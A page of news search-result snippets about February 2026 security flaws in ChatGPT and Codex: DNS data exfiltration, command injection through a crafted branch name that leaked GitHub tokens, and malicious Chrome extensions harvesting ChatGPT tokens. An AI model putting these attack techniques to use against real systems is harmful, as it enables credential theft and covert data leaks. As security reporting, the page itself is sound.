ChatGPT and Codex flaws patched Feb 2026 exposed DNS exfiltration and GitHub tokens, raising enterprise AI security risks.
What happens when researchers think outside the box? Data gets exfiltrated through DNS.
Command injection in Codex and a hidden outbound channel in ChatGPT exposed risks of credential theft and covert data ...
Hackers can steal your GitHub tokens through OpenAI’s Codex using nothing more than a sneaky branch name ...
5don MSN
Security experts discover critical flaw in OpenAI's Codex able to compromise entire organizations
Researchers managed to steal GitHub OAuth tokens by abusing a command injection vulnerability.
Cybersecurity researchers have discovered several malicious Google Chrome extensions that hijack Amazon affiliate links, steal data, and collect ChatGPT authentication tokens. In late January, Socket ...
What if you could achieve the same results with a fraction of the effort? OpenAI’s latest innovation, ChatGPT 5.1, promises to do just that by slashing token usage by up to a staggering 80%. Imagine ...
Some results have been hidden because they may be inaccessible to you
Show inaccessible results